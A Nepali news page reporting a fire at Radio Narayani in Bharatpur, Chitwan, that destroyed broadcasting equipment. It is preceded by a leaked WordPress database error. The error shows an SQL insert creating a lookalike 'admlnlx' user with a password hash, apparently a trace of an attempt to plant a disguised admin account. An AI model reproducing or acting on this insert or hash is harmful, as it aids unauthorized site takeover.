WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B.KhtEDhy6eZ4tKoiDtgYKlSaBBtIb0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-04 14:48:42', '', 'admlnlx', 'admlnlx')
चितवन,माघ ३-
चितवनको भरतपुस्थित सामुदायिक रेडियो , रेडियो नारायणीमा आगलागी भएको छ ।ब्याकअपको लागी राखिएको सोलारको चार्ज कन्ट्रोलरबाट आगोलागी भएको रेडियो नारायणीले जनाएको छ ।
आगलागीका कारण ब्याट्री,युपिएस,ट्रान्समिटर,तथा अन्य प्रसारण प्रविधि जलेर नष्ट भएको रेडियो नारायणीका गोबिन्द देवकोटाले जानाकारी दिनुभयो ।। दमकल र स्थानीयको सहयोगमा एक घण्टामा आगो नियन्त्रणमा आएको थियो ।
आगलागी कारण रेडियो नारायणीको सबै उपकरणहरु जलेर नष्ट भएपछि रेडियोको प्रसारण बन्द भएको छ ।